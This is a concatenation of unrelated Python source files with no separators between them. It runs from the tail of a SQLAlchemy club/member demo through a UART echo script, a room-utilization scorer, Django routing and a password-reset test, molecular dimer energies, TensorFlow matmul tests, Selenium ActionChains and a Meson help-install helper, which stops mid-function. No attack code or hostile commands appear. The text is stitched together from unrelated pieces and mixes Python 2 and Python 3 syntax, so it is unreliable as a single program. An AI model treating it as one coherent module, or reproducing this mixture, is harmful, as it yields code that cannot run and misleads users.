# query and print Members again to show Jane is gone
res = session.query(Member).all()
for member in res:
    print member.first_name, member.last_name , [club.name for club in member.clubs]

# query and print Clubs; clubs themselves are untouched by the member delete
res = session.query(Club).all()
for club in res:
    print club.name, [(member.first_name, member.last_name) for member in club.members]

print 'After removing the club, Club dub'
# Delete a Club; members survive, only their link rows disappear
record = session.query(Club).filter(Club.name == 'Club dub').all()
for r in record:
    session.delete(r)

session.commit()

# query and print Members one last time
res = session.query(Member).all()
for member in res:
    print member.first_name, member.last_name , [club.name for club in member.clubs]

# query and print remaining Clubs
res = session.query(Club).all()
for club in res:
    print club.name, [(member.first_name, member.last_name) for member in club.members]

import os

# Application constants
APP_NAME = 'job_offers'
# Absolute directory containing this module; anchors the file paths below.
INSTALL_DIR = os.path.dirname(os.path.abspath(__file__))
# logging-module format string: timestamp - logger name - level - message
LOG_FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
LOG_NAME = os.path.join(INSTALL_DIR, 'job_offers.log')

# Testing fixtures
JOB_OFFER_FIXTURES = os.path.join(INSTALL_DIR, "fixtures/job_offers.json")

#!/usr/bin/python
# uart-eg01.py
#
# to run on the other end of the UART
# screen /dev/ttyUSB1 115200

import serial

def readlineCR(uart):
	"""Read single bytes from *uart* until a carriage return arrives.

	Returns the accumulated line as bytes, including the trailing b'\\r'.
	Blocks indefinitely if no CR ever arrives.
	"""
	buf = bytearray()
	while True:
		ch = uart.read()
		buf.extend(ch)
		if ch == b'\r':
			return bytes(buf)

# Open the USB serial adapter; timeout=1 makes uart.read() return b'' after
# one second of silence (readlineCR then keeps polling).
uart = serial.Serial('/dev/ttyUSB0', baudrate=115200, timeout=1)

# Simple echo REPL: prompt, read one CR-terminated line, echo it back.
# Sending "exit" (CR-terminated) closes the port and quits.
while True:
	uart.write(b'\r\nSay something: ')
	line = readlineCR(uart)
	if line != b'exit\r':
		lineStr = '\r\nYou sent     : {}'.format(line.decode('utf-8'))
		uart.write(lineStr.encode('utf-8'))
	else:
		uart.write(b'\r\nexiting\r\n')
		uart.close()
		exit(0)

from rec import CourseRecord
from score import RoomScore
from evaluation import ScheduleEvaluation

FULL_HOURS    = 8                 # 8:00AM - 4:00PM utilization
PARTIAL_HOURS = FULL_HOURS * 0.75 # 75%
HALF_HOURS    = FULL_HOURS * 0.50 # 50%
SPARSE_HOURS  = FULL_HOURS * 0.25 # 25%

# Days the scheduler knows about (Mon Tue Wed Thu Fri Sat).
WEEKDAYS = ("M", "T", "W", "R", "F", "S")


class LocationScore:
    """Aggregates per-course weighted scores for one location (building + room).

    Expects ``evals`` to provide ``get_records()`` yielding (course, score)
    pairs -- presumably a ScheduleEvaluation; confirm against callers. Each
    course exposes ``rec["DAYS_OF_WEEK"]``, ``rec["BUILDING"]`` and
    ``rec["ROOM"]``; each score exposes ``get_weighted_score(course)``.
    """

    def __init__(self, evals=None):
        self.evals   = evals
        self.courses = None
        self.location = None

        # Per-day accumulators; reset_daily_weights() replaces the placeholder
        # dicts with numeric zeros before any arithmetic happens.
        self.daily_weights  = {"M": {}, "T": {}, "W": {}, "R": {}, "F": {}, "S": {}}
        self.daily_totals   = {"M": {}, "T": {}, "W": {}, "R": {}, "F": {}, "S": {}}
        self.final_weighted = 0
        # 0 = worst; normalize_final_weighted_score() replaces this with a
        # "0.00".."10.00" string.
        self.weight_rank = 0
        if evals is not None:
            self.courses = self.evals.get_records()
            self.location = self.find_location()
            self.final_weighted = self.calculate_final_weighted_score()

    def reset_daily_weights(self):
        """Zeroes both per-day accumulators."""
        for day in WEEKDAYS:
            self.daily_weights[day] = 0
            self.daily_totals[day]  = 0

    def get_daily_weight(self, day_of_week):
        """Returns the (adjusted) average weight for one day key ("M".."S")."""
        return self.daily_weights[day_of_week]

    def normalize_final_weighted_score(self, minimum, maximum):
        """Rescales final_weighted into [0, 10] against the given range.

        Stores the result in ``weight_rank`` as a "0.00"-style string.
        A degenerate range (maximum <= minimum) ranks as 0.
        """
        value = self.final_weighted
        value -= minimum
        if maximum - minimum > 0:
            value /= (maximum - minimum)
        else:
            value = 0
        self.weight_rank = "{0:.2f}".format(value * 10)

    def calculate_final_weighted_score(self):
        """Averages per-day utilization-adjusted weights over all courses.

        Returns 0.0 when there are no course records (the original raised
        ZeroDivisionError in that case).
        """
        score_sum   = 0.00
        score_total = 0.00

        self.reset_daily_weights()

        for course, score in self.courses:
            days = course.rec["DAYS_OF_WEEK"]
            score_total += 1.00
            for day in WEEKDAYS:
                if day in days:
                    self.daily_weights[day] += score.get_weighted_score(course)
                    self.daily_totals[day]  += 1

        for day in WEEKDAYS:
            if self.daily_totals[day] > 0:
                # Average the day's weight, then penalize/boost by utilization.
                self.daily_weights[day] /= self.daily_totals[day]
                self.daily_weights[day] = self.adjust_utilization(self.daily_weights[day], self.daily_totals[day])
                score_sum += self.daily_weights[day]
            else:
                self.daily_weights[day] = 0

        if score_total == 0:
            return 0.0
        return score_sum / score_total

    def adjust_utilization(self, weights, totals):
        """Scales a day's weight by how heavily the room is used that day."""
        if totals >= FULL_HOURS:            # 8 hours or more: slight boost
            weights *= 1.15                 # 15% boost
        elif totals >= PARTIAL_HOURS:       # small penalty
            weights *= (PARTIAL_HOURS / FULL_HOURS)
        elif totals >= HALF_HOURS:          # medium penalty
            weights *= (HALF_HOURS / FULL_HOURS)
        elif totals > SPARSE_HOURS:         # large penalty
            weights *= (SPARSE_HOURS / FULL_HOURS)
        else:                               # very large penalty
            weights *= (1.00 / FULL_HOURS)
        return weights

    def get_location(self):
        """Returns the "BUILDING ROOM" string found at construction time."""
        return self.location

    def find_location(self):
        """Derives "BUILDING ROOM" from the first course record.

        All records are assumed to share one room. Returns None when there
        are no records (the original raised NameError in that case).
        """
        for course, _score in self.courses:
            return str(course.rec["BUILDING"]) + " " + str(course.rec["ROOM"])
        return None

    def get_final_weighted_score(self):
        return self.final_weighted

    def get_score_rank(self):
        return self.weight_rank

    def get_evals(self):
        return self.evals

"""redblue_project URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Add an import:  from blog import urls as blog_urls
    2. Import the include() function: from django.conf.urls import url, include
    3. Add a URL to urlpatterns:  url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url, include
from django.contrib import admin

# Route table: the red/blue app URLconfs get namespaces so reverse() can
# disambiguate, e.g. reverse('red_namespace:<name>').
urlpatterns = [
    url(r'^red/', include('apps.red_app.urls', namespace='red_namespace')),
    url(r'^blue/', include('apps.blue_app.urls', namespace='blue_namespace')),
    url(r'^admin/', admin.site.urls),
]

from djangosanetesting.cases import HttpTestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from django.core import mail
from accounts.tests import testdata

class TestResetPassword(HttpTestCase):
    """Walks the password-reset flow up to the reset-confirmation page.

    Runs against a live server on localhost:8000 via djangosanetesting.
    """

    def __init__(self, *args, **kwargs):
        # Name the class explicitly: super(self.__class__, ...) recurses
        # infinitely as soon as this class is subclassed.
        super(TestResetPassword, self).__init__(*args, **kwargs)
        self.host = 'localhost'
        self.port = 8000

    def setUp(self):
        # Load account fixtures before every test.
        testdata.run()

    def test_reset_password(self):
        """Requests a reset and follows the emailed link to the reset form."""
        res = self.client.post(reverse('password_reset'),
                               {'register_number': settings.TEST_USERNAME},
                               follow=True)

        # Redirected to the "done" page, and exactly one email went out.
        assert reverse('password_reset_done') in res.request['PATH_INFO']
        assert len(mail.outbox) == 1

        # First http(s) URL in the email body is the reset link.
        reset_url = [word for word in mail.outbox[0].body.split() if word.startswith('http')][0]
        res = self.client.get(reset_url, follow=True)

        assert res.status_code == 200
        assert 'unsuccessful' not in res.content.lower()
        assert 'change my password' in res.content.lower()

        # I've to stop here, because next step is to change password at Google Apps.
        # Can't mess up production database.

# Reference energies for a set of molecular dimers/complexes, keyed by the
# structure number embedded in the corresponding .xyz file name (81-102).
energies = {
    81:  -3.17,     # Ammoniadimer.xyz
    82:  -5.02,     # Waterdimer.xyz
    83:  -1.50,     # BenzeneMethanecomplex.xyz
    84: -18.61,     # Formicaciddimer.xyz
    85: -15.96,     # Formamidedimer.xyz
    86: -20.65,     # Uracildimerhbonded.xyz
    87: -16.71,     # 2pyridoxine2aminopyridinecomplex.xyz
    88: -16.37,     # AdeninethymineWatsonCrickcomplex.xyz
    89:  -0.53,     # Methanedimer.xyz
    90:  -1.51,     # Ethenedimer.xyz
    91:  -2.73,     # Benzenedimerparalleldisplaced.xyz
    92:  -4.42,     # Pyrazinedimer.xyz
    93: -10.12,     # Uracildimerstack.xyz
    94:  -5.22,     # Indolebenzenecomplexstack.xyz
    95: -12.23,     # Adeninethyminecomplexstack.xyz
    96:  -1.53,     # Etheneethynecomplex.xyz
    97:  -3.28,     # Benzenewatercomplex.xyz
    98:  -2.35,     # Benzeneammoniacomplex.xyz
    99:  -4.46,     # BenzeneHCNcomplex.xyz
    100: -2.74,     # BenzenedimerTshaped.xyz
    101: -5.73,     # IndolebenzeneTshapecomplex.xyz
    102: -7.05,     # Phenoldimer.xyz
}

# Geometry file names keyed by the same structure numbers used in `energies`.
names = {
    81:  "Ammoniadimer.xyz",
    82:  "Waterdimer.xyz",
    83:  "BenzeneMethanecomplex.xyz",
    84:  "Formicaciddimer.xyz",
    85:  "Formamidedimer.xyz",
    86:  "Uracildimerhbonded.xyz",
    87:  "2pyridoxine2aminopyridinecomplex.xyz",
    88:  "AdeninethymineWatsonCrickcomplex.xyz",
    89:  "Methanedimer.xyz",
    90:  "Ethenedimer.xyz",
    91:  "Benzenedimerparalleldisplaced.xyz",
    92:  "Pyrazinedimer.xyz",
    93:  "Uracildimerstack.xyz",
    94:  "Indolebenzenecomplexstack.xyz",
    95:  "Adeninethyminecomplexstack.xyz",
    96:  "Etheneethynecomplex.xyz",
    97:  "Benzenewatercomplex.xyz",
    98:  "Benzeneammoniacomplex.xyz",
    99:  "BenzeneHCNcomplex.xyz",
    100: "BenzenedimerTshaped.xyz",
    101: "IndolebenzeneTshapecomplex.xyz",
    102: "Phenoldimer.xyz",
}

from bitmovin.utils import Serializable


class AutoRestartConfiguration(Serializable):
    """Value object bundling auto-restart trigger settings.

    All arguments are optional; None leaves the corresponding trigger unset.
    Attribute names are camelCase, matching the REST API payload keys
    (presumably serialized as-is by Serializable -- confirm).
    """
    def __init__(self, segments_written_timeout: float = None, bytes_written_timeout: float = None,
                 frames_written_timeout: float = None, hls_manifests_update_timeout: float = None,
                 dash_manifests_update_timeout: float = None, schedule_expression: str = None):
        super().__init__()
        self.segmentsWrittenTimeout = segments_written_timeout
        self.bytesWrittenTimeout = bytes_written_timeout
        self.framesWrittenTimeout = frames_written_timeout
        self.hlsManifestsUpdateTimeout = hls_manifests_update_timeout
        self.dashManifestsUpdateTimeout = dash_manifests_update_timeout
        self.scheduleExpression = schedule_expression

from google.appengine.ext import db

class Stuff (db.Model):
    """A binary blob tied to the user who stored it."""
    # auto_current_user makes owner track the user of the current request.
    owner = db.UserProperty(required=True, auto_current_user=True)
    pulp = db.BlobProperty()

class Greeting(db.Model):
    """A posted message with optional author and avatar blob."""
    author = db.UserProperty()
    content = db.StringProperty(multiline=True)
    avatar = db.BlobProperty()
    # Stamped once when the entity is first put() (auto_now_add).
    date = db.DateTimeProperty(auto_now_add=True)

class Placebo(db.Model):
    """Flat record of coding-system metadata; every field is a free-form string."""
    developer = db.StringProperty()
    OID = db.StringProperty()
    concept = db.StringProperty()
    category = db.StringProperty()
    taxonomy = db.StringProperty()
    taxonomy_version = db.StringProperty()
    code = db.StringProperty()
    descriptor = db.StringProperty()

# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

"""Tests for tensorflow.ops.math_ops.matmul."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import tensorflow.python.platform

import numpy as np
import tensorflow as tf

from tensorflow.python.kernel_tests import gradient_checker as gc


class MatMulTest(tf.test.TestCase):
  """Compares tf.matmul against a NumPy reference for several dtypes/shapes."""

  def _testMatmul(self, x, y, transpose_x, transpose_y, use_gpu):
    """Runs tf.matmul on one device and checks value and shape vs NumPy."""
    # NOTE(review): np.matrix is deprecated in modern NumPy; kept to match
    # the rest of this file's style.
    x_mat = np.matrix(x).T if transpose_x else np.matrix(x)
    y_mat = np.matrix(y).T if transpose_y else np.matrix(y)
    np_ans = x_mat * y_mat
    with self.test_session(use_gpu=use_gpu):
      tf_ans = tf.matmul(x, y, transpose_x, transpose_y).eval()
    self.assertAllClose(np_ans, tf_ans)
    self.assertAllEqual(np_ans.shape, tf_ans.shape)

  def _testCpuMatmul(self, x, y, transpose_x=False, transpose_y=False):
    """CPU variant; signature kept for existing callers."""
    self._testMatmul(x, y, transpose_x, transpose_y, use_gpu=False)

  def _testGpuMatmul(self, x, y, transpose_x=False, transpose_y=False):
    """GPU variant; signature kept for existing callers."""
    self._testMatmul(x, y, transpose_x, transpose_y, use_gpu=True)

  def _randMatrix(self, rows, cols, dtype):
    """Returns a rows x cols array of uniform random values in [1, 100)."""
    if dtype is np.complex64:
      real = self._randMatrix(rows, cols, np.float32)
      imag = self._randMatrix(rows, cols, np.float32)
      # np.complex(0, 1) used the alias removed in NumPy 1.24; the builtin
      # imaginary literal is equivalent.
      return real + 1j * imag
    else:
      return np.random.uniform(low=1.0, high=100.0, size=rows * cols).reshape(
          [rows, cols]).astype(dtype)

  # Basic test:
  #   [ [1],
  #     [2],
  #     [3],   *  [1, 2]
  #     [4] ]
  def testFloatBasic(self):
    x = np.arange(1., 5.).reshape([4, 1]).astype(np.float32)
    y = np.arange(1., 3.).reshape([1, 2]).astype(np.float32)
    self._testCpuMatmul(x, y)
    self._testGpuMatmul(x, y)

  def testDoubleBasic(self):
    x = np.arange(1., 5.).reshape([4, 1]).astype(np.float64)
    y = np.arange(1., 3.).reshape([1, 2]).astype(np.float64)
    self._testCpuMatmul(x, y)

  def testInt32Basic(self):
    x = np.arange(1., 5.).reshape([4, 1]).astype(np.int32)
    y = np.arange(1., 3.).reshape([1, 2]).astype(np.int32)
    self._testCpuMatmul(x, y)

  def testSComplexBasic(self):
    x = np.arange(1., 5.).reshape([4, 1]).astype(np.complex64)
    y = np.arange(1., 3.).reshape([1, 2]).astype(np.complex64)
    self._testCpuMatmul(x, y)

  # Tests testing random sized matrices.
  def testFloatRandom(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(n, k, np.float32)
      y = self._randMatrix(k, m, np.float32)
      self._testCpuMatmul(x, y)
      self._testGpuMatmul(x, y)

  def testDoubleRandom(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(n, k, np.float64)
      y = self._randMatrix(k, m, np.float64)
      self._testCpuMatmul(x, y)

  def testInt32Random(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(n, k, np.int32)
      y = self._randMatrix(k, m, np.int32)
      self._testCpuMatmul(x, y)

  def testSComplexRandom(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(n, k, np.complex64)
      y = self._randMatrix(k, m, np.complex64)
      self._testCpuMatmul(x, y)

  # Test the cases that transpose the matrices before multiplying.
  # NOTE(keveman): The cases where only one of the inputs is
  # transposed are covered by tf.matmul's gradient function.
  def testFloatRandomTransposeBoth(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(k, n, np.float32)
      y = self._randMatrix(m, k, np.float32)
      self._testCpuMatmul(x, y, True, True)
      self._testGpuMatmul(x, y, True, True)

  # (method name keeps its historical "Tranpose" typo so external test
  # filters keep matching)
  def testDoubleRandomTranposeBoth(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(k, n, np.float64)
      y = self._randMatrix(m, k, np.float64)
      self._testCpuMatmul(x, y, True, True)

  def testMatMul_OutEmpty_A(self):
    n, k, m = 0, 8, 3
    x = self._randMatrix(n, k, np.float32)
    y = self._randMatrix(k, m, np.float32)
    self._testCpuMatmul(x, y)
    self._testGpuMatmul(x, y)

  def testMatMul_OutEmpty_B(self):
    n, k, m = 3, 8, 0
    x = self._randMatrix(n, k, np.float32)
    y = self._randMatrix(k, m, np.float32)
    self._testCpuMatmul(x, y)
    self._testGpuMatmul(x, y)

  def testMatMul_Inputs_Empty(self):
    n, k, m = 3, 0, 4
    x = self._randMatrix(n, k, np.float32)
    y = self._randMatrix(k, m, np.float32)
    self._testCpuMatmul(x, y)
    self._testGpuMatmul(x, y)


# TODO(zhifengc): Figures out how to test matmul gradients on GPU.
class MatMulGradientTest(tf.test.TestCase):
  """Numerically checks tf.matmul gradients w.r.t. each input on the CPU."""

  def _Verify(self, transpose_a, transpose_b, wrt):
    """Builds matmul(x, y) and checks the numeric gradient of input `wrt`.

    Args:
      transpose_a: whether matmul transposes x (x is built pre-transposed).
      transpose_b: whether matmul transposes y (y is built pre-transposed).
      wrt: 0 to differentiate w.r.t. x, 1 for y.
    """
    shape_x = [3, 2]
    shape_y = [2, 4]
    if transpose_a:
      shape_x = list(reversed(shape_x))
    if transpose_b:
      shape_y = list(reversed(shape_y))
    with self.test_session(use_gpu=False):
      x = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=shape_x,
                      dtype=tf.float64, name="x")
      y = tf.constant([1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7],
                      shape=shape_y, dtype=tf.float64, name="y")
      m = tf.matmul(x, y, transpose_a, transpose_b, name="matmul")
      if wrt == 0:
        err = gc.ComputeGradientError(x, shape_x, m, [3, 4])
      else:
        err = gc.ComputeGradientError(y, shape_y, m, [3, 4])
    print("matmul input%d gradient err = " % wrt, err)
    self.assertLess(err, 1e-10)

  def testGradientInput0(self):
    self._Verify(False, False, wrt=0)

  def testGradientInput1(self):
    self._Verify(False, False, wrt=1)

  def _VerifyInput0(self, transpose_a, transpose_b):
    # Kept for interface compatibility; delegates to the shared checker.
    self._Verify(transpose_a, transpose_b, wrt=0)

  def testGradientInput0WithTranspose(self):
    self._VerifyInput0(transpose_a=True, transpose_b=False)
    self._VerifyInput0(transpose_a=False, transpose_b=True)
    self._VerifyInput0(transpose_a=True, transpose_b=True)

  def _VerifyInput1(self, transpose_a, transpose_b):
    # Kept for interface compatibility; delegates to the shared checker.
    self._Verify(transpose_a, transpose_b, wrt=1)

  def testGradientInput1WithTranspose(self):
    self._VerifyInput1(transpose_a=True, transpose_b=False)
    self._VerifyInput1(transpose_a=False, transpose_b=True)
    self._VerifyInput1(transpose_a=True, transpose_b=True)


if __name__ == "__main__":
  # Discovers and runs all tf.test.TestCase classes defined above.
  tf.test.main()

# Copyright 2011 WebDriver committers
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""The ActionChains implementation."""
from selenium.webdriver.remote.command import Command

class ActionChains(object):
    """Generate user actions.
    All actions are stored in the ActionChains object. Call perform() to fire
    stored actions.

    Every builder method queues a closure and returns self, so calls can be
    chained; nothing is sent to the driver until perform().
    """

    def __init__(self, driver):
        """Creates a new ActionChains.
        Args:
            driver: The WebDriver instance which performs user actions.
        """
        self._driver = driver
        self._actions = []

    def perform(self):
        """Performs all stored actions, in the order they were queued."""
        for action in self._actions:
            action()

    def click(self, on_element=None):
        """Clicks an element.
        Args:
            on_element: The element to click.
                        If None, clicks on current mouse position.
        Returns:
            Self, for chaining.
        """
        if on_element: self.move_to_element(on_element)
        # button 0 = left mouse button
        self._actions.append(lambda:
            self._driver.execute(Command.CLICK, {'button': 0}))
        return self

    def click_and_hold(self, on_element):
        """Holds down the left mouse button on an element.
        Args:
            on_element: The element to mouse down.
                        If None, clicks on current mouse position.
        Returns:
            Self, for chaining.
        """
        if on_element: self.move_to_element(on_element)
        self._actions.append(lambda:
            self._driver.execute(Command.MOUSE_DOWN, {}))
        return self

    def context_click(self, on_element):
        """Performs a context-click (right click) on an element.
        Args:
            on_element: The element to context-click.
                        If None, clicks on current mouse position.
        Returns:
            Self, for chaining.
        """
        if on_element: self.move_to_element(on_element)
        # button 2 = right mouse button
        self._actions.append(lambda:
            self._driver.execute(Command.CLICK, {'button': 2}))
        return self

    def double_click(self, on_element):
        """Double-clicks an element.
        Args:
            on_element: The element to double-click.
                        If None, clicks on current mouse position.
        Returns:
            Self, for chaining.
        """
        if on_element: self.move_to_element(on_element)
        self._actions.append(lambda:
            self._driver.execute(Command.DOUBLE_CLICK, {}))
        return self

    def drag_and_drop(self, source, target):
        """Holds down the left mouse button on the source element,
           then moves to the target element and releases the mouse button.
        Args:
            source: The element to mouse down.
            target: The element to mouse up.
        Returns:
            Self, for chaining.
        """
        self.click_and_hold(source)
        self.release(target)
        return self

    def drag_and_drop_by_offset(self, source, xoffset, yoffset):
        """Holds down the left mouse button on the source element,
           then moves by the given offset and releases the mouse button.
        Args:
            source: The element to mouse down.
            xoffset: X offset to move to.
            yoffset: Y offset to move to.
        Returns:
            Self, for chaining.
        """
        self.click_and_hold(source)
        self.move_by_offset(xoffset, yoffset)
        self.release(source)
        return self

    def key_down(self, key, element=None):
        """Sends a key press only, without releasing it.
        Should only be used with modifier keys (Control, Alt and Shift).
        Args:
            key: The modifier key to send. Values are defined in Keys class.
            element: The element to send keys.
                     If None, sends a key to current focused element.
        Returns:
            Self, for chaining.
        """
        if element: self.click(element)
        self._actions.append(lambda:
            self._driver.execute(Command.SEND_MODIFIER_KEY_TO_ACTIVE_ELEMENT, {
                "value": key,
                "isdown": True}))
        return self

    def key_up(self, key, element=None):
        """Releases a modifier key.
        Args:
            key: The modifier key to send. Values are defined in Keys class.
            element: The element to send keys.
                     If None, sends a key to current focused element.
        Returns:
            Self, for chaining.
        """
        if element: self.click(element)
        self._actions.append(lambda:
            self._driver.execute(Command.SEND_MODIFIER_KEY_TO_ACTIVE_ELEMENT, {
                "value": key,
                "isdown": False}))
        return self

    def move_by_offset(self, xoffset, yoffset):
        """Moving the mouse to an offset from current mouse position.
        Args:
            xoffset: X offset to move to.
            yoffset: Y offset to move to.
        Returns:
            Self, for chaining.
        """
        self._actions.append(lambda:
            self._driver.execute(Command.MOVE_TO, {
                'xoffset': xoffset,
                'yoffset': yoffset}))
        return self

    def move_to_element(self, to_element):
        """Moving the mouse to the middle of an element.
        Args:
            to_element: The element to move to.
        Returns:
            Self, for chaining.
        """
        self._actions.append(lambda:
            self._driver.execute(Command.MOVE_TO, {'element': to_element.id}))
        return self

    def move_to_element_with_offset(self, to_element, xoffset, yoffset):
        """Move the mouse by an offset of the specificed element.
        Offsets are relative to the top-left corner of the element.
        Args:
            to_element: The element to move to.
            xoffset: X offset to move to.
            yoffset: Y offset to move to.
        Returns:
            Self, for chaining.
        """
        self._actions.append(lambda:
            self._driver.execute(Command.MOVE_TO, {
                'element': to_element.id,
                'xoffset': xoffset,
                'yoffset': yoffset}))
        return self

    def release(self, on_element):
        """Releasing a held mouse button.
        Args:
            on_element: The element to mouse up.
        Returns:
            Self, for chaining.
        """
        if on_element: self.move_to_element(on_element)
        self._actions.append(lambda:
            self._driver.execute(Command.MOUSE_UP, {}))
        return self

    def send_keys(self, *keys_to_send):
        """Sends keys to current focused element.
        Args:
            keys_to_send: The keys to send.
        Returns:
            Self, for chaining.
        """
        self._actions.append(lambda:
            self._driver.switch_to_active_element().send_keys(*keys_to_send))
        return self

    def send_keys_to_element(self, element, *keys_to_send):
        """Sends keys to an element.
        Args:
            element: The element to send keys.
            keys_to_send: The keys to send.
        Returns:
            Self, for chaining.
        """
        self._actions.append(lambda:
            element.send_keys(*keys_to_send))
        return self

# Copyright 2016 The Meson development team

# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at

#     http://www.apache.org/licenses/LICENSE-2.0

# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
import subprocess
import shutil
import argparse
from .. import mlog
from ..mesonlib import has_path_sep
from . import destdir_join
from .gettext import read_linguas

def _bool_arg(value):
    """Parses a command-line boolean.

    A bare ``type=bool`` treats any non-empty string -- including "False" --
    as True, which is a well-known argparse pitfall.
    """
    return value.lower() in ('yes', 'true', '1')

parser = argparse.ArgumentParser()
parser.add_argument('command')
parser.add_argument('--id', dest='project_id')
parser.add_argument('--subdir', dest='subdir')
parser.add_argument('--installdir', dest='install_dir')
parser.add_argument('--sources', dest='sources')
parser.add_argument('--media', dest='media', default='')
parser.add_argument('--langs', dest='langs', default='')
parser.add_argument('--symlinks', type=_bool_arg, dest='symlinks', default=False)

def build_pot(srcdir, project_id, sources):
    """Extracts a .pot template from the 'C' sources with itstool."""
    # itstool wants the source paths relative to srcdir's 'C' directory.
    relative_sources = [os.path.join('C', src) for src in sources]
    pot_path = os.path.join(srcdir, project_id + '.pot')
    subprocess.call(['itstool', '-o', pot_path] + relative_sources)

def update_po(srcdir, project_id, langs):
    """Merges each language's .po file with the current .pot template."""
    pot_path = os.path.join(srcdir, project_id + '.pot')
    for lang in langs:
        po_path = os.path.join(srcdir, lang, lang + '.po')
        # -q: quiet; merge in place (output file == input .po)
        subprocess.call(['msgmerge', '-q', '-o', po_path, po_path, pot_path])

def build_translations(srcdir, blddir, langs):
    """Compiles each language's .po into a .gmo under blddir/<lang>/."""
    for lang in langs:
        lang_dir = os.path.join(blddir, lang)
        os.makedirs(lang_dir, exist_ok=True)
        po_file = os.path.join(srcdir, lang, lang + '.po')
        gmo_file = os.path.join(lang_dir, lang + '.gmo')
        subprocess.call(['msgfmt', po_file, '-o', gmo_file])

def merge_translations(blddir, sources, langs):
    """Merges compiled .gmo translations back into the sources via itstool."""
    for lang in langs:
        gmo_file = os.path.join(blddir, lang, lang + '.gmo')
        out_dir = os.path.join(blddir, lang)
        subprocess.call(['itstool', '-m', gmo_file, '-o', out_dir] + sources)

def install_help(srcdir, blddir, sources, media, langs, install_dir, destdir, project_id, symlinks):
    """Install help pages and media for each language (plus 'C') into install_dir.

    Pages for the untranslated 'C' locale are copied from the source tree;
    translated pages come from the build tree.  Media files fall back to the
    'C' copy when a language does not ship its own, either by symlinking
    (when ``symlinks`` is set and the platform supports it) or by copying.
    """
    c_install_dir = os.path.join(install_dir, 'C', project_id)
    for lang in langs + ['C']:
        # destdir_join keeps DESTDIR-staged installs working.
        indir = destdir_join(destdir, os.path.join(install_dir, lang, project_id))
        os.makedirs(indir, exist_ok=True)
        for source in sources:
            # Translated sources were generated into blddir; 'C' sources live
            # in the source tree.
            infile = os.path.join(srcdir if lang == 'C' else blddir, lang, source)
            outfile = os.path.join(indir, source)
            mlog.log('Installing %s to %s' % (infile, outfile))
            shutil.copyfile(infile, outfile)
            shutil.copystat(infile, outfile)
        for m in media:
            infile = os.path.join(srcdir, lang, m)
            outfile = os.path.join(indir, m)
            c_infile = os.path.join(srcdir, 'C', m)
            if not os.path.exists(infile):
                # This language has no localized copy of the media file.
                if not os.path.exists(c_infile):
                    mlog.warning('Media file "%s" did not exist in C directory' % m)
                    continue
                elif symlinks:
                    # Link to the *installed* 'C' media file instead of
                    # duplicating it per language.
                    srcfile = os.path.join(c_install_dir, m)
                    mlog.log('Symlinking %s to %s.' % (outfile, srcfile))
                    if has_path_sep(m):
                        os.makedirs(os.path.dirname(outfile), exist_ok=True)
                    try:
                        try:
                            os.symlink(srcfile, outfile)
                        except FileExistsError:
                            # Replace a stale link/file from a previous install.
                            os.remove(outfile)
                            os.symlink(srcfile, outfile)
                        continue
                    except (NotImplementedError, OSError):
                        # e.g. Windows without symlink privilege.
                        mlog.warning('Symlinking not supported, falling back to copying')
                        infile = c_infile
                else:
                    # Lang doesn't have media file so copy it over 'C' one
                    infile = c_infile
            mlog.log('Installing %s to %s' % (infile, outfile))
            if has_path_sep(m):
                # The media path contains subdirectories; create them first.
                os.makedirs(os.path.dirname(outfile), exist_ok=True)
            shutil.copyfile(infile, outfile)
            shutil.copystat(infile, outfile)

def run(args):
    """Entry point: parse the helper's arguments and dispatch the subcommand."""
    options = parser.parse_args(args)
    sources = options.sources.split('@@')
    langs = options.langs.split('@@') if options.langs else []
    media = options.media.split('@@') if options.media else []
    destdir = os.environ.get('DESTDIR', '')
    src_subdir = os.path.join(os.environ['MESON_SOURCE_ROOT'], options.subdir)
    build_subdir = os.path.join(os.environ['MESON_BUILD_ROOT'], options.subdir)
    abs_sources = [os.path.join(src_subdir, 'C', source) for source in sources]

    # Fall back to the LINGUAS file when no languages were given explicitly.
    if not langs:
        langs = read_linguas(src_subdir)

    command = options.command
    if command == 'pot':
        build_pot(src_subdir, options.project_id, sources)
    elif command == 'update-po':
